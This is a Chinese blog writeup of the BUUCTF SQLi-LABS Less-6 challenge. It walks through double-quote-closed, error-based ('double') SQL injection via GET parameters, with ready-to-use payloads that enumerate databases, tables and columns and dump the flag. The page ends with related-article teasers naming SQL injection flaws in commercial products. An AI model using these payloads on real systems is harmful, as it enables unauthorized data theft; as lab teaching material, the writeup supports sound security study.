首页 > 数据库 >【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-6 Writeup(SQL注入+GET请求+报错注入+双注入+双引号闭合+字符型注入)

【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-6 Writeup(SQL注入+GET请求+报错注入+双注入+双引号闭合+字符型注入)

时间:2024-09-22 22:55:50浏览次数:18  
标签:Web group information 报错 --+ 注入 id select schema

sqli-labs

1
点击启动靶机。

SQLi-LABS Page-1(Basic Challenges)


原理

双注入

模板:

select count(*),concat(([payload]),floor(rand(0)*2)) as a from [table_name] group by a

解法

发送 GET 请求,id 作为参数。

http://b3f804a6-9ba6-418d-ac25-bf8d48589b62.node5.buuoj.cn/Less-6/?id=1

?id=1'

没有报错。

?id=1"

发生错误。

构造闭合:

?id=1"; --+

正常输出。

判断列数:

?id=1" order by 1,2,3; --+

?id=1" order by 1,2,3,4; --+

到4时报错,有三列。

判断输出位置:

?id=-1" union select 1,2,3; --+

没有输出。

爆库名:

?id=-1" union select 1,count(*),concat((select group_concat(schema_name) from information_schema.schemata),floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

没有报错。

?id=-1" union select 1,count(*),concat((select schema_name from information_schema.schemata limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

有个 ctftraining 表。

爆表名:

?id=-1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='ctftraining'  limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

有个 flag 表。

爆列名:

?id=-1" union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='ctftraining'  limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

查询 flag:

?id=-1" union select 1,count(*),concat((select flag from ctftraining.flag limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

Flag

flag{6baf6140-4646-4f31-bb61-e42b13de98a1}

参考资料

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

标签:Web,group,information,报错,--+,注入,id,select,schema
From: https://blog.csdn.net/qq_34988204/article/details/138653604

相关文章

  • javaweb第一课
    初识web前端web标准Web标准也称为网页标准,由一系列的标准组成,大部分由W3C(WorldWideWebConsortium,万维网联盟)负责制定。三个组成部分:HTML:负责网页的结构(页面元素和内容)。CSS:负责网页的表现(页面元素的外观、位置等页面样式,如:颜色、大小等)。Javascript......
  • Web刷题之polarctf靶场(2)
    1.蜜雪冰城吉警店点开靶场,发现题目说点到隐藏奶茶(也就是第九杯)就给flag,但是明显就只有八杯,猜测大概率考的是前端代码修改把id=1修改为id=9,然后回到页面点击原味奶茶即可弹出flag#flag{7d43cc8863ad0ee649048e562fde53ec}2.召唤神龙打开靶场发现是一个游戏,爽......
  • 用友U8CRM relobjreportlist.php SQL注入漏洞复现
    0x01漏洞描述:        用友U8CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。        用友U8CRM客户关系管理系统relobjreportlist.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏......
  • 9.9付费进群系统 wxselect SQL注入漏洞复现
    0x01漏洞描述:2024年9.9付费进群Plus版系统是一种新的社群管理方式,用户通过支付9.9元人民币即可加入特定的微信群,享受群内提供的服务或资源。这种模式通常用于知识分享、资源下载、专业交流等社群,通过设置门槛来筛选成员,提高群组的专业性和互动质量。在位于/group/controlle......